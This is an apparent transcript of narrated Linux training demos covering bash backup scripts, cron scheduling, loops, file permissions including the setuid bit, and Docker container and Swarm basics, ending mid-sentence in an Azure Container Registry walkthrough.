function for this. If you want to be able to call it by name, which is what I want, then sure, make a function of it. All my function is doing is using the tar command with --lowercase c for create, z for compress, v verbose file, and then the backup file I want to create will be called full_backup dash. And notice here, all I'm doing is referring to my year variable that I've defined above, dash month variable I've defined above, and another dash and my $day variable that I've defined above, and then I'm adding .tar.gz as an extension. Now, what am I backing up? I want to be able to back up everything under /home. Any error messages that might pop up, because we did ask for verbose, --lowercase v. Any error messages that might pop up, I want them discarded. So 2, greater than sign for redirection, /dev/null. And then after that, I have a double greater than sign, append. I want to append what's been backed up and whatnot to a file called, so full underscore backup underscore log dash $date_var.log. So I'll have a running list in that log of backups. Okay, now what I'm doing is creating a weekday variable because I only want to back things up on a particular day of the week in my particular example. It doesn't have to be this way. So weekday equals, and within backticks, I've got date, piping that to the translate command tr dash lowercase s. So I want to make sure that I substitute any spaces, which is single occurrences of spaces if there's more than one space between some things. Pipe that to cut, dash field 1 is what I want to cut out where the delimiter is a space. In other words, I want the weekday. Then I'm testing what day of the week it is. Case, $weekday in. If it's a Wednesday, then I want to do a full backup. And then I want to echo, backup was successful. Then double semicolon. Then I've got a listing here that says if it's a Monday or, that's the pipe here in this context, Tuesday or Friday or Thursday or whatever the case might be, close parentheses, double semicolon, we're doing nothing. And then I close my case block with the word case backwards. There are so many ways to do this. So let's see what happens if we try to run this. Let's get out of here, clear the screen. Notice if I do an ls, we don't have any backup files yet. I think our file names would start with the word full. Also, notice if I run the date, it's Thursday. Okay, so if I run /backup.sh, we get nothing. Well, that's because it's Thursday right now, but in our script, we're testing for Wednesday. Well, why don't we change that just to see if it works? If it's Thursday, THU, capital THU, I'll just modify the other days of the week and we'll save that out to our script. Let's run our script again. Okay, this time it says backup was successful because it actually is Thursday and that's what our script is looking for. So if I do an ls, we've got our full backup, and notice it's very nicely put in the year, the month, the day.tar.gz. Although it looks like we have a little problem here with our backup log. It's full backup log dash nothing. Let's open up our script. Oh, it looks like it's referring to something that doesn't exist, date var. Well, actually, let's just remove that. We don't want that because we could have many different dates within our backup log. So we'll write that out. Let's just remove any files that start with full. Let's just run our script again. Backup was successful. Okay, now it's a little bit neater. We've got our compressed backup of the home directory. Let's take a look at the backup log. That's what we wanted. It's giving me a list of everything that it backed up. Because remember, we did a tar backup using the dash lowercase v for verbose. It gave me a list of everything it backed up under home. So there you go. That is an example of how you might work with a backup shell script. In this demonstration, the focus will be on how to schedule a backup script. First of all, let's take a look at what we've got for a backup script. If I do an ls in my home directory, I've got a backup script file here called backup.sh. The reason here in Ubuntu Linux it's got a red background is because if we do an ll of that backup script file, it's got the special user ID bit set. That's lowercase s. The s is lowercase because there's also an execute permission there. If there weren't, it would be a capital. But the special user ID bit means as long as a user has read and execute to the directory and this file, backup.sh, when they run that script, instead of running with their permissions, the invoker permissions, the script will run with the owning user permissions. That's the purpose of the special user ID bit, as you might recall. Okay, and if we just go into that with sudo nano, and take a quick peek at the script, it's just setting up some variables. It's using the tar command to do basically a backup of /home, and that only happens on certain days. Now, in this example, we're going to remove the logic at the bottom here that tests which weekday it is because we're going to determine that when we schedule it as a cron job. Okay, so we've pared down our script. Let's go out and save that. What we could do is change directory to /etc. Let's do an ls of things that start with cron. Okay, we've got some interesting subdirectories here, such as cron.daily, which has a number of scripts here for backing things up daily or performing any type of task daily. It doesn't have to be backups. We've got nothing in cron.hourly, so this machine is not doing anything hourly, at least not here. It could be set in a user cron tab, which is what we'll look at after. We've got a cron.monthly directory, nothing in it, and cron.weekly. Okay, so if we wanted to, we could configure this at the system level as a scheduled cron job, but we can also run cron tab-e for edit to edit our own individual user cron tab for the user we're currently signed in as. That's how I'm going to do this. It says no cron tab for C Blackwell. That's the user I'm signed in as, using an empty one, and then we can choose the editor that we want to use to create our cron file. I'm going to use Nano, so I'll choose number 1 and press enter. Lots of comments here that explain how to use this, but let's say I want to do a backup every day at midnight. Well, notice here in the comment above, it's got minute, hour, day of month, and day of week, and then the command. Okay. For the minute, an hour of 0 means midnight, where 12 would be noon, 12 p.m. I want this to happen at midnight. Which day of the month? Asterisk for every day of the month. Otherwise, I could put in the value. Which month? Every month. I want this backup to occur. Which day of the week? I want this backup to happen only on Saturdays at midnight. So I'll put in 6, which means Saturday. Finally, the last parameter, as you know, is the command. Whether it's just commands to run, maybe separated with semicolons, or in this case, a reference to a script. So I'll give it the full path and name of the script, /home/cblackwell/backup.sh. Now you need to have made sure that you've tested your backup script manually at the command line to make sure it itself works properly. Okay, Control X, and our cron tab is now set to go, which means our backup script is scheduled to run. Let's go ahead and just run our backup script. Backup.sh, I'm in my user home directory where that script exists. There are no backup files. Well, this is why we said it's going to be very important to make sure you test this manually before you try to schedule it and add that layer of complexity when you're troubleshooting why nothing happened. All right, well, there's a good reason for this. Let's go back into it. Nano, backup.sh. The reason it's not working is because we have a function definition here for the backup called full_backup, but we're never calling the name of the function. Remember, we removed the test of the week date? All right, let's get rid of that week date line. Let's just call the function full_backup. So now if we run our script once again, do an ls, now it's working. We've got our backup compressed file and we've got a backup log. Okay, so we know that it works manually. So assuming our syntax is correct in our cron tab, which it is, our backup script will be executed when we scheduled it for midnight on Saturdays. The last thing to think about is looking at the man page for the structure of the cron tab file so you know exactly how the syntax works. I'm going to type man _5 cron tab. This means I don't want help with the cron tab command, but the 5 means I want help on the format of the configuration file for cron tab. This is always going to be important. For example, further down in the man page, it talks about the fields, such as the day of the week. Now you might say, well, does the day of the week, Sunday, does that start at 1? Is it 1 to 6, 0 to 7? Like, what is it? You'll find that out in the man page. It tells us right here, clear as a bell. 0 or 7 is Sunday, or you can use the names. We know here that we can use an asterisk. You can use ranges of numbers, such as 0 to 4, if you want to include, for example, those days of the weeks or those months or wherever you've listed that item. Or if you want to specify something to run every 2 hours, you could just use under the hours column in your cron tab file, */2. So there are a lot of interesting ways to schedule things. And if you can't memorize every possible syntactical combination, because cron tab scheduling isn't something you do all the time, just go into the man page to find out what the details are. In this demonstration, we're going to take a look at a couple of variations of how to work with a for looping construct. Now, whether you're using a for loop at the command line or within a script really makes no difference at all syntactically. So let's start with a basic example at the command line. I'm going to start with for and then 2 opening parentheses, I = 1, semicolon, I < 5, semicolon, I ++, and 2 closing parentheses. What I'm doing is establishing a counter variable that I've chosen to call I. I could have called it pineapple. It doesn't matter. So I'm going to initialize that with the value of 1. I want the loop to continue while I is < 5, and I'm incrementing I by 1, I ++, each time through the loop. Enter. Now, a for looping construct has a do and then a done block. Your code goes within those 2 statements. So do, why don't we just echo back $I to prove it's working, and then on another line, done, enter. Notice it went through the loop. It started by echoing back I, which started off with the value of 1. The next time through the loop, it was incremented by 1, so 2, 3, 4. It didn't do 5 because our condition was not I < or = 5, it was I < 5. Okay, that's a simple, standard, hard-coded way to start with a for loop. But what you can also do is something like this. For I in, and maybe I want to do 5 through to and including 10. So 5 dot dot 10 within curly braces. Do echo $I. I'm just echoing back the I variable. You could do anything you wanted to do, really. Put in a done. Notice here it started at 5 and it kept incrementing automatically by 1, unless you tell it otherwise. 5, 6, 7, 8, 9, 10. It even included 10 because we didn't have a statement that said less than 10. Now we could modify that previous example, and instead of just 5 dot dot 10, so we got our starting and our ending value, but after the 10, I might add another dot dot and say I want the increment to be 2. Notice now we started at 5, incremented by 2 to 7, then the next time through the loop, incremented by 2 once again to 9, and then after that we'd be beyond 10, so it stopped. Next, consider this example. So we've got our construct once again of a for loop where we've got a range 5 to 10 with an increment of 2, and in our loop we start within the do block by echoing $I. So right away, no matter what, we're going to get a 5 for sure. So it displayed 5 down in the output below. Then we're doing a test. If test $I, that's our counter variable, if it equals 9, then we want to break out of the loop. And then our closing fi, which is if backwards, and then done. But wait a minute. It's supposed to break out when the value of the I variable equals 9, yet it's printing 9. Well, what you have to watch out for with this type of thing is the placement of things like echo statements. The echo statement is being executed before we test $I. What if we put our echo statement after it? So we have the same construct, except what I've done is moved the echo $I from right after do to after our if test. That way it gets a chance to test to see if I has a value of 9, and if it does, it breaks out of the loop, and notice the output now only includes 5 and 7. The placement of your executable statements within your for loop blocks is critical. Now, we have worked with arrays already, but you might have an array populated with something that you want to process as part of your for loop. Consider this example. I'm going to create a variable called IPs, and it will equal, in parentheses and open double quote, let's start with one IP address, close the double quote, space. The second array element, again, will be enclosed in double quotes. It will simply be just another IP address. So we can manually populate arrays in this way or read it from a file or whatever the case might be. I'll close the parentheses. Let's just make sure our array variable is working okay. So I'm going to echo it back, echo $, open curly brace, IPs, and the name of the variable, remember, is case sensitive. And in square brackets, I'll put an @ symbol, which means all array elements are to be returned. Closing curly brace, enter. There's the 2 IPs. Okay, let's build that into a loop. Let's say we did this for I, or I can change that variable name. Why not change it? For host underscore IP, that's going to be my placeholder variable each time through the loop. In what? Well, within all of the elements in the array. $, open curly brace, IPs, open square bracket, @ symbol, close square bracket, close curly brace. So if we've got 2 IP addresses within that array, the loop's going to run twice. If we've got 1,000 IPs in the array, the loop will run 1,000 times. And then we've got our do block. We'll start with the word do. What do you want to do? I want to ping, let's say -C2. That means count, only 2 ping packets. Otherwise, it's endless. And I want to ping $, host underscore IP, because that's our temporary placeholder variable each time through the loop as we process each array element. Perfect. And then we'll do a done. Okay, it's already trying to ping the first IP. Of course, if firewalls are blocking ping traffic or all ICMP traffic, you won't get a response. So there might be a bit of a delay with this particular example. And now it's automatically moved on to the second example. And in the same way, if it's not up and running or if it's firewalled in some way, it'll eventually time out, but it will only have transmitted 2 ping echo requests. Now, there are endless examples of working with for loops to process the results of Linux commands, to read in the contents of files, and maybe read in a file and populate an array. And then, of course, we know how to work with arrays. But we want to be able to establish when we should be using a for loop, whether at the command line or within a shell script. In this demonstration, we'll take a look at how to work with a while loop, whether you're using it at the command line or within a shell script. The syntax doesn't even change. So let's focus here on the command line, even though it doesn't make a difference if it's in a script or not. I'm going to start by creating a variable called I, and I'm going to set its value to 1. And I'm going to write a while loop. So the statement will look like this. I'll use while, followed by a space, and then within square brackets, I've got my condition to keep the loop running. So while $I is less than or equal to 6. -LE is the less than or equal to operator. What do we want to do? So I've got a do and a done block. I'm going to start by echoing the current value of $i, this time through the loop. But then we don't have a way up in our expression where we are incrementing I each time through the loop. So I can do that by saying I equals $, 2 opening parentheses, $I, so whatever its current value is, the first time through the loop, that will be 1, and we're going to add 1 to it. So then it would be a value of 2. Then we hit the done part of the block and go back up to the top and test our condition, which means it would be 2. It would still be less than or equal to 6. So I is being incremented each time through the loop, and we're echoing back the value, which is why the output here includes 1, 2, 3, 4, 5, 6. Now then we have the concept of an endless loop, which can be useful until a certain signal is received. For example, I've got a file here already created called menu.sh, a little simple menu system. So I've got my shebang statement at the top. I've got a function definition here for show_IP info. And then here's my while loop. Look at the construct at the top. It simply says while true. Well, true is always true. So this is one of many ways to create an endless while loop. Then you have your do block. And within the do block, we're just clearing the screen, echoing a simple utility menu, asking the user to enter their choice and reading what they type in with the read keyword and putting that in a variable called selection, which we then test with the case block. If it's 1, then we run our show_IP info function. If it's 2, to list logged on users, we just run the who command. And if it's 3, we clear the screen and we exit. So we have our open and closing case statement. Then I have a read statement with the word junk. Junk is just the name of the variable. It could be anything. This is just a way to pause the screen output. For example, if the user types 1 to show IP info, we want to give them the chance to see it before it goes back up to the top of the do loop and clears the screen on them. Same with number 2. Let's test this out. So I'll save it, make sure that change mode is used to make sure read and execute are set for that file. And let's run it, /menu.sh. Okay, that's kind of cool. Here's our utility menu where we can press number 1 to show IP info, which is going to run our little function. Okay, it's returning some basic IP stuff. The read junk statement is what's causing the pause here. There are many ways to do that. That's just a simple way. Enter. Back to the menu. We're still going on through the loop. We haven't pressed 3 yet. Number 2, list logged on users. It just ran the who command, show who's logged in and from where. Press enter. And if I press 3, we're out. So sometimes you'll just want a while loop for that kind of purpose, such as displaying a little menu system, a customized utility menu. As another example, let's take a look at another while true loop. So we've got while true, we've got our starting do statement and our ending done statement. So our executable block, where we're doing a few things. Really, the only difference here is what we're doing within the block. We're using the read statement in Linux to read user input, -P for prompt, enter hours worked, followed by hourly wage, or enter -1 to quit. All of that's in double quotes. Now we have 2 things we want the user to enter on the same line, but separated by space. We want the hours, number of hours worked, and then the hourly wage. Now, the way that we're setting up this loop is that if we want to exit, we type in -1. It could be anything. So we have an if statement. If, within square brackets, $hours, which is the first parameter, -EQ equals -1, close the square bracket, then break. Now, break works to get out of a for loop. It also works to get out of a while loop. And then we have our closing FI to close off the if statement construct. So if they don't want to exit and they've entered in an hourly wage and hours worked, we'll calculate what the pay is. So we're creating a pay variable, which equals $, 2 opening parentheses, hours multiplied by wage. Those are the variables up above for the read statement. 2 closing parentheses, and then we just echo back the $pay variable. Then we have our done statement. So it says, enter hours worked, followed by hourly wage, or -1 to quit. Okay, let's say it's 40 hours worked, space at $30 an hour. So 40 space 30 on the same line, enter. It returns back 1,200 as the pay. Indeed, that is the correct math. And it's still asking us enter hours worked because we have a while true loop. However, we can simply type -1 in this case to quit. It's just another variation on how to handle a loop where you need it to keep asking something or you need it to keep doing something. When you're writing shell scripts, attention to detail is necessary because some of the syntax can be very unforgiving. Those details will vary between shells. So there are some different syntax rules for variable handling and quotes and so on, from a C shell to a corn shell to a bash shell and whatnot. One of the first things we have to think about with the shell script is where to run it from. If I do an ls, in my current directory, I have all kinds of shell scripts. For example, there's one called menu. Now, because I'm in the subdirectory within it, and I know that, I could type ./menu.sh, and it runs. Okay, well, let me just press 3 to quit out of that. If I do a long listing for menu.sh, it's working. It allows me to run it because I am currently signed in as user C. Blackwell, as evidenced by typing ID. I'm user C. Blackwell. C. Blackwell is the owning user of menu.sh and therefore has read, write, and execute permissions. Let's change those permissions. First of all, let's run sudo change owner, let's say to root for menu.sh. Okay. If we do an ll of menu.sh, root is now the owner, and therefore root would have read, write, execute. But of course, there's other permissions for others here. Let's remove those. sudo chmod g minus rwx for menu.sh. Just do an ll. Okay, group permissions are gone. sudo chmod o for other minus rx, because that's what they have, read and execute. And let's do an ll of that. Okay, only root has permissions to this file. However, as we know from the ID command, we're not logged in as root. We're logged in as C. Blackwell. If I simply run ./menu.sh, we get a permission denied. Well, that makes perfect sense. C. Blackwell doesn't have read and execute. Root does. Another interesting thing to consider is to set the special user ID bit. Let's run sudo chmod 750 for menu.sh. Let's do an ll of that. So now read and execute has been turned on for the C. Blackwell group. When I type ID, I'm logged in as C. Blackwell, but my primary group is also a group of the same name. That's what Linux does. That can be changed. That just happens to be the default behavior. So I wonder what would happen now if I run ./menu.sh. It runs. Well, of course it will, because in this particular case, the user I'm logged in with is a member of this group, and the group has read and execute permissions. So it works. If we were to remove the permissions, sudo chmod, at least execute, -x, well, let's do it this way, actually, g minus x for menu sh, we ll it, so read is there, execute is not, for the C. Blackwell group. If we try to run ./menu sh, we get a permission denied. You need the correct permissions. So if we correct it, sudo chmod, group plus x, because that's what's missing, and then go ahead and try to run that again, it works fine. Now that's just to run the script itself. What if the script is doing something beyond the privileges of the user invoking it? And that's back to our special user ID bit. Currently, when we do a long listing of menu sh, the owning user has read, write, execute, the group has read, execute. We're going to change that. sudo 4750 menu.sh. The leading 4 is the numeric value for the special user ID bit. 2 would be for the group bit, 1 would be for the sticky bit. So we're just setting the special user ID bit. The 7, of course, is read, write, execute for 2 and 1. The 5 is just 4 and 1, read and execute, and then 0, which is nothing for everyone else. I suppose we should probably do that with change mode, shouldn't we? Yes. So if I do a long listing, the background color changes to red, and we've got a lowercase s where the owner execute permission normally shows. Lowercase s means there's also execute set there, otherwise it would be a capital S. We're not going to see it in this particular example, but of course we can still just go ahead and run that script. It runs fine. But if that script was doing stuff that only the owner, in this case root, is allowed to do, it would work. Because even though we're invoking it as C. Blackwell, because the special user ID bit is set, it will run as user root. The other common thing to watch out for, and let's just go ahead and nano function test.sh, is that when you declare a function, you don't call it anywhere. In other words, you don't refer to it. If you don't, it won't run. And when you refer to it, if there are no parameters, you just refer to it by its name. You don't need the open and close parentheses. And while we're in here, it's always crucial when you're troubleshooting shell scripts to make sure you've got your shebang line correct. If you're pointing to the incorrect shell, but the script was written for something different, a different type of command interpreter, it can yield unexpected results depending on the nature of the code within the script. So watch out for that type of thing. Let's also not forget about variable scope. So if I go into a script I have called export_var_script, all it's doing is echoing back a variable called script var. Okay, if I echo back script var here at the command prompt, there's nothing. Let's run that script. We get nothing. Okay, that's fine. It wasn't defined anywhere. Let's write some data into the script var variable. Script var equals testing 1, 2, 3, close quote. Here at the command prompt, if we echo script var, it returns testing 1, 2, 3. Let's run our script. It doesn't return it, even though our script is referring to the correct variable name. Remember the scope of variables, they're only in the current shell where you define them. Same with functions. You can export them to solve this problem. If I were just to say export script var, if I echo it here at the command prompt, it still returns the data, but if I run the script now, it also returns the data. So watch out for variable and function scope when you're trying to refer to them in different shells. And of course, naturally, always watch out for the syntax of the code you're typing in, making sure you put a $ in front of variables when you want to use them, or backticks surrounding commands whose result you want stored in a variable. In this demo, I'm going to be installing the Docker engine on Linux. The Docker engine, of course, is required if you want to be able to run Docker containers, application containers. And you can run the Docker engine on a variety of platforms. It doesn't have to be Linux. However, here I will be installing it on Ubuntu Linux, and we'll just make sure it's up and running once we get it installed. Docker can also run within a physical server environment or a virtual machine. It makes no difference at all. So the first thing I'll do here is run sudo apt install docker.io. It asks if I want to continue. It's going to take about 293 megabytes of additional disk space. That's no problem. I'll type in the letter Y for yes and press enter to get the installation started. Okay, once that's done, I'll begin just by running sudo docker to make sure that the Docker CLI, the command line interface, is installed. It returns the next level commands that I would run after the Docker keyword, so we know that the Docker CLI is available. It was installed along with the Docker engine. I'm going to run sudo service docker status. Okay, it looks like the Docker daemon is running in the background. It says active and running. That's good. It means we're ready to go with working with application containers. If I were to run sudo docker images, it would show any local container images that I might have available on this host. Where we've just installed the Docker engine, of course, there is nothing available locally. Here in my web browser, I've navigated to hub.docker.com. I could register a free account here, but I can also search through some publicly available container images. I'm going to search for one I know is here called Alpine. It says a minimal Docker image based on Alpine Linux, and so on. So this is a Docker official image, so we know it's safe, and if I click on it to open it up, I get more details about it, including the command that would be used to download that container image to my Docker host. It's telling me simply to issue the docker pull commands, followed by the name of the container image, which is Alpine. Now you might wonder, how on earth does it know to grab that from this location on the internet? Docker is hard-coded. If you don't specify a container image repository, it will assume you mean Docker Hub. Well, that makes sense. So therefore, if I were to run sudo docker pull Alpine, as long as I have a valid internet connection, that's all it's going to take to bring that down. It's very small and lightweight. The size of application containers can vary wildly. It just depends on what the app consists of, what it does, how many files there are, how big the files are, and whatnot. So it says it downloaded the Alpine container image with the tag of latest, so latest version. Let's clear the screen and let's just run sudo docker images. Okay, notice before we had nothing, but now, of course, it's showing that we have the Alpine container image available. Well, we just downloaded it, so that makes sense. I'm going to run sudo docker run because I want to actually run the container from the container image that we just downloaded. I'll use the -lowercase I and t command line parameters for Docker run, which means I want to run this in interactive mode and have a terminal into the container. You'll see what I mean here. And then I'll give it the name of the container image, which is Alpine. Now, because we asked for an interactive terminal, notice our command prompt has changed. We are actually in a command prompt within our Alpine container, which is now running. Containers load very quickly because they don't contain an entire OS. It's just using the OS that's already running on the underlying Docker host. So if I type ls right now, this is not happening on my Linux machine. This is happening within the running Alpine container. Containers have their own file systems. What those file systems contain will vary, but they do have their own file systems. Some of them won't interact in this way like we've gone in with the command prompt, but others will. If I want to get out of this, I can type exit, Well, actually, let's run ls first just to prove that, oh, yeah, we get a different listing because now we're not in the Alpine container anymore. We're back in our underlying Linux host. And so when I type ls, of course, I get a totally different list of files and directories than we had previously within the Alpine container. What I wanted to do was run sudo docker ps, which will show us any containers that are currently running. Now, of course, there are none because we exited out of the Alpine container. But if I run that previous command with the dash lowercase a, I'll see all containers that were running. Doesn't have to be running right now. And it says here under status that apparently I exited that Alpine container about 38 seconds ago. So that gives us the bare bones basics on how to get the Docker engine up and running by installing it on Linux and verifying that the CLI is installed and also verifying that we can run a container. In this demonstration, the focus is going to be on the Docker CLI, or command line interface. This is going to be important because this is how you interact with the Docker daemon, with the Docker engine that you would have installed on your Linux host. So being familiar with the syntax on how to work with container images and so on is important. The first thing we'll do is just run sudo service docker status, just to verify that indeed it is showing as active and running. Okay, so we had to install it, now it's up and running. If we were just to issue sudo docker all by itself, notice it returns back the next level commands that we would issue after the word docker at the command line, so we know that the CLI was installed along with the Docker engine. Let's pick on one of these commands. Let's say RMI, remove one or more images. That, of course, means container images. So if we were to run sudo docker RMI and just press enter, it comes back and says, well, it requires at least one argument, but you can get further help by adding -- help after your Docker syntax. Oh, let's try that. sudo docker RMI -- help. Okay, so there's not really a whole lot to this Docker command, just options, which happens to be -f, lowercase f, or -- force to force removal of the image and not ask for confirmation. And then the -no -prune option to not delete untagged parents. Of course, we then specify the name of the container image, or images if we specify more than one on the command line. So knowing how to interpret this is going to be important to learn how to use Docker. If you don't have a lot of experience with the Docker CLI, I would recommend setting up a virtual machine, running Linux, install Docker on it, and experiment. Have a sandbox. Another important command here is going to be sudo docker version. This gives us the details on things like the Docker engine, the API version, if you're a programmer and want to hook into some of the Docker APIs. If I scroll back up a little bit, the first part of our output from Docker version is the client info. What version of the CLI are we running? So the version string is reported here. Again, it's normally the same as the Docker engine. Now, if I run sudo docker images, actually notice what happens if I omit the sudo and I'm not logged in as root, it results in permission denied types of messages. So sudo docker images will show any container images I might have locally stored on this Docker host. I've already pulled one down from Docker Hub. It's called Alpine. Now you can use the sudo docker pull command to pull down a container image from a repository. If you don't specify the repository, it's assumed you're pulling it down from Docker Hub. For example, let's bring down one that I know is there, a container image I know exists called Caddy. It's just a tiny web server stack. So given that we have an internet connection, it's going to bring it down. Let's clear the screen. Let's once again run sudo docker images. So we had Alpine shown already. Now we have the Caddy container image shown, and the tag, well, the version is the latest version. The unique image ID is shown, the creation date, and the size. These are very small container images. And remember that Docker containers do not contain the entire operating system because it just uses the underlying OS of the Docker host. They load up quickly, and as a result, they're much smaller than an equivalent virtual machine would be. So if I want to run a container based on the Caddy container image, I can do that with the sudo docker run command. I'm going to use the lowercase p because what I want to do is take my local port 80 and map that to port 80 running within the container, so 80:80. Not every container has a web server stack, of course, but Caddy does. And then, of course, I'll tell it the name of the container image, which is Caddy. And it returns information, so I know then that it's running.
I could press Control C to stop that. And of course, if I run sudo docker ps with no command line parameters, nothing's currently running. But if I add a dash lowercase a to that command, it'll show me any containers that were running in the past, such as caddy. So we had that up and running about 33 seconds ago, it says. We had the Alpine container up and running about 2 days ago. So if you're not already familiar with the Docker CLI, it can be important to run sudo docker and then just kind of scroll back up through the output to take a look at some of the things that you can do, such as working with Docker container images or Docker container overlay networks that allows inter-Docker host communication, which is normally used by Docker Swarm, which is a way to have a cluster of machines working together to support containerized applications. So we also have a Swarm keyword for that down at the bottom. But notice those fall under the heading in the help here of management commands. Down below, if we just go under commands, then we've got things like running docker build to build an image from a Docker file. We'll take a look at that later. You can run the docker cp command to copy file system objects between containers and the local file system on the Docker host. This is actually possible. Or you might use the docker exec command to run a specific command within a container. And if that container is running Linux and it's got a bash shell, you could even exec bash to get a command prompt. So that's just a quick little sample of some of the things you can do with the Docker CLI. You can use a Docker container overlay network as a way to create a higher level network that interconnects Docker hosts. So it's a distributed network linking Docker hosts together. Normally, this is done when you're working with Docker Swarm. Docker Swarm is kind of like having a cluster of Docker machines working together to run containerized application. Establishing a Docker container overlay network doesn't mean that your Docker hosts have to be on the same underlying subnet. They can be split up on different networks that are interconnected by routers. It really makes no difference. Now, while you can specify customized details for your overlay network, when you work with Docker Swarm, when you set up a Swarm manager that manages other nodes in the cluster, it will automatically have a default container overlay network created. So let's take a look at how that works. So the first thing to consider is which one of your Docker hosts will be the manager node that will manage the other nodes. So I've gone to that server where I'm going to issue the sudo docker swarm init command. So I'm initializing a Docker Swarm cluster. Okay, so it says Swarm initialized current node, and it's now a manager. It says to add a worker node or the other nodes that get managed to the Swarm, you need to run the following command. So what I would do is copy this command to other Docker hosts that I want to be part of this Docker Swarm. So on a server called Ubuntu 2, I'm going to go ahead and paste in that specific command. Now when I paste it, of course, there's no sudo prefix in front of it, so of course it's going to say permission denied. But I'm going to use my up arrow key, go to the beginning of the command, and add the sudo prefix. Okay, and just like that, it says this node joined a swarm as a worker. Now, in order for these nodes to talk together, some ports need to be opened, like TCP port 2377, TCP and UDP ports 7946, and UDP 4789. So you might have to just firewall rules or security group rules, such as if you're using virtual machines in the cloud, to allow for this communication. If I switch back to the Swarm Manager node, I would then issue commands such as sudo docker node ls list the nodes that are part of this Docker Swarm, and notice both of them are shown here. The one we're at, which is the manager, Ubuntu 1, and the worker node we just added from the other machine, that's called Ubuntu 2. Now, if we run sudo docker network ls list networks, notice that we've got the overlay driver here shown here for Docker Swarm, where we have a network ID that was generated and is shown here in the leftmost column. We've got our default overlay network that was created for communication among those Docker Swarm nodes. Now here on the manager, I'm going to go ahead and run the sudo docker service create command. I want to create a Docker service that will run in my swarm, --name. Let's call it caddy because it will be based on the caddy container image, which is a tiny web server. I've already downloaded and I have that container image available here on this host. --p, I want to map port 80 on this local Docker machine, to port 80, which I know the web service stack is listening on within the container's configuration. And caddy is the actual name of the image. So I'll put that in at the end. Enter. Okay, we get a message back that 1 out of 1 is running and that the service has converged. So if I were to run commands like sudo Docker service, we're talking about a swarm cluster service, PS, I want to list what's running, but which one? Caddy, C-A-D-D-Y, that's what we called it. Technically, that one is now showing as running on Ubuntu 1. This communication is happening over our overlay network. So to verify our web app is running, if I were to run the curl command and just point to the local host IP 127.0.0.1:80 for port 80, it returns back our default Caddy web page. Now, what's really interesting here, and this is because of the underlying overlay network, on my second worker node in the cluster, if I do the exact same thing, meaning if I run curl 127.0.0.1:port 80, we still get it reported back. We get the HTML web page. So one of the cool things about an overlay network with the Docker Swarm is that they're all listening on any published services initialized in the swarm, even though they might not be locally running that container, like Ubuntu 2 is not. Because remember, if we go back to our manager node for the Docker Swarm and run sudo docker service ps caddy, remember, it's reporting back that it's technically running on the Ubuntu 1 node. The last thing we'll do here is run sudo docker network inspect. Well, actually, before we do that, let's do docker network ls. Remember, the name column shows the names. We're going to be interested in poking in and looking at the ingress default overlay network. Of course, notice you've got the other standard bridged networks that allow the Docker hosts to talk to the real underlying network. Let's focus on the ingress network. What that means is I'm going to run sudo docker network inspect ingress. Let's pipe that to more. Here we've got the details like the name, the ID, when it was created, the scope it applies to, which is Swarm. It's using the overlay driver. IPv6 has not been enabled for that overlay network. But notice that the subnet range is shown here, insider notation, along with the gateway IP, because it is like having an actual network there. And notice it's making a reference to containers that will utilize the ingress overlay network. So there's our Caddy Swarm service that we deployed. So if you really want to define your own network, you can, but often the first thing to do, especially if you're working with Docker Swarm, is to stick with the default ingress network unless needs dictate otherwise. If you're going to be working a lot with Docker containers, one consideration is potentially signing up on Docker Hub. That's at hub.docker.com with a free account. You'll have access to more container images than you otherwise would if you don't have an account. You'll also have the option of creating a repository or a collection of container images. However, of course, you can just search Docker Hub for anything that you might need. For example, if I search MySQL, there's an official MySQL Docker official image. And if we click to open up the details, as you might guess, to get that container image down on your local Docker host, you would run docker pull and then the name of the container image here, which is simply called MySQL. Now, we're not specifying a repository or that we're pulling this down from Docker Hub, as that is assumed as a default unless you specify otherwise. Let's go ahead and pull down that Docker container image on our Docker host. So here on my server, Ubuntu 1, if I run sudo service docker status, it's showing as active and running, which is great. And if I run sudo docker images, it shows any existing container images I have on this machine. I've already downloaded 2 public images from Docker Hub. One's called Caddy, one's called Alpine, but we do not have the MySQL container image here yet. So we know to bring that down, we simply run sudo docker pull, and in this case, it's simply called MySQL. Couldn't be easier than that. It assumes you're pulling it from Docker Hub, and before you know it, it will have been downloaded. We can verify this with sudo docker images, and now MySQL shows. It's larger than the other container images that we downloaded, which is why it took a little bit longer to bring down. An important part of managing containers is to get them up and running from a given container image. So my command will be sudo docker run. Let's say I want to use a name here called MySQL test1. I'm giving a name that I want to give to my running container. -e, these are all lowercase. This is where I can set the MySQL _root password variable, which is all uppercase here, or directive, equal to whatever I want the password to be. And I'll just specify as the last parameter that I want this to load from the MySQL local container image. Or I could specify the version also. If we've got multiple versions, we don't. But notice the version tag is showing here as the word latest. Okay, and then finally down below, it says that it's ready for connections on the standard MySQL listening port of 3306 on this host. So you could use whatever tools you normally use, like the MySQL Workbench GUI tool, to make a connection to this. It's a fully functional MySQL database running within an app container. Here I've opened up another command prompt on that same server because when you load up a container, if you don't tell it to run in the background as a daemon with lowercase d, it takes control of your command prompt. So here from this other login terminal, if I run sudo docker ps, notice that MySQL is up and running as well as caddy. So I can run sudo docker stop, and we named our MySQL container MySQL test 1. Okay, let's take a look now. sudo docker ps. Okay, that one's down. Let's bring the other one down. sudo docker stop. And I'll just go ahead and copy the name here and paste it in. And if we clear the screen, and once again, sudo docker ps, there are none running. Okay, let's execute this command, sudo docker run dash lowercase itd. So interactive terminal and detach. So it'll run in the background. And we want to do that for Alpine. Notice, okay, actually, if we don't put in the D, we get an interactive terminal, and we are now placed into the Alpine Linux command prompt environment, where if I type ls, this is happening in the container. So I'll type exit. Let's use our up arrow key to bring up that previous command, but what we'll add to docker run, in addition to the dash lowercase I and t, is a D to run in detached mode. Okay, now we have our command prompt back. It didn't automatically take us into the Alpine command prompt. And if we run an sudo docker ps, notice that the Alpine container is running now. Because we didn't specify a name, it comes up with a random name, in this case, naughty_Allen. But that stems from the Alpine container image. So we could run sudo. So to interact with that container, we could run sudo docker exec to execute dash lowercase it interactive terminal naughty_Allen, and I could tell it what I want to execute, such as /bin/sh, the shell. And notice it puts us right into the shell. So in other words, you don't have to connect initially when you fire up or run the Docker container. You can connect to it or exec whatever you need within it after the fact. In this demonstration, I will be creating a cloud-based container registry. And then what we'll do is we'll upload, or we will push, a container image from our local Docker host into our container registry. I'm signed into the Microsoft Azure portal where I already have an account. In here, I'll click the Create a Resource button, and in the search bar, I will search for Azure Container, and up pops Azure Container Registry. So I'm going to select Container Registry from Microsoft, and then I'll click Create. Now, why would we go through this procedure? When you start working with Docker for a while, you're going to come up with quite a few customized container images, and so you might want a way to organize them and store 